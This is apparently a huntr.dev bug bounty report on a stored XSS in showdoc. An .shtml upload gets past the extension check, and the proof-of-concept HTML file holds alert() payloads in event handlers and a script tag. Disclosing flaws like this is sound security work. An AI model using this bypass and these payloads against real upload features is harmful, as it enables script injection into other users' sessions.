Stored xss in showdoc through file upload in star7th/showdoc
Valid
Reported on
Mar 12th 2022
Description
Hi. This is a bypass to the report in https://huntr.dev/bounties/df347aa9-ed9b-4f75-af99-c83b8aad3bcf/ . It fails to check for files with the extension .shtml
which leads to stored xss
Proof of Concept
// poc.shtml
<html>
<body>
<h1 onmouseover=alert(1)>adsasdadsdsa</h1>
<svg/onload=alert()>
<script>alert(1)</script>
</body>>
</html>>
Impact
Stored Xss
We are processing your report and will contact the
star7th/showdoc
team within 24 hours.
a year ago
We have contacted a member of the
star7th/showdoc
team and are waiting to hear back
a year ago
to join this conversation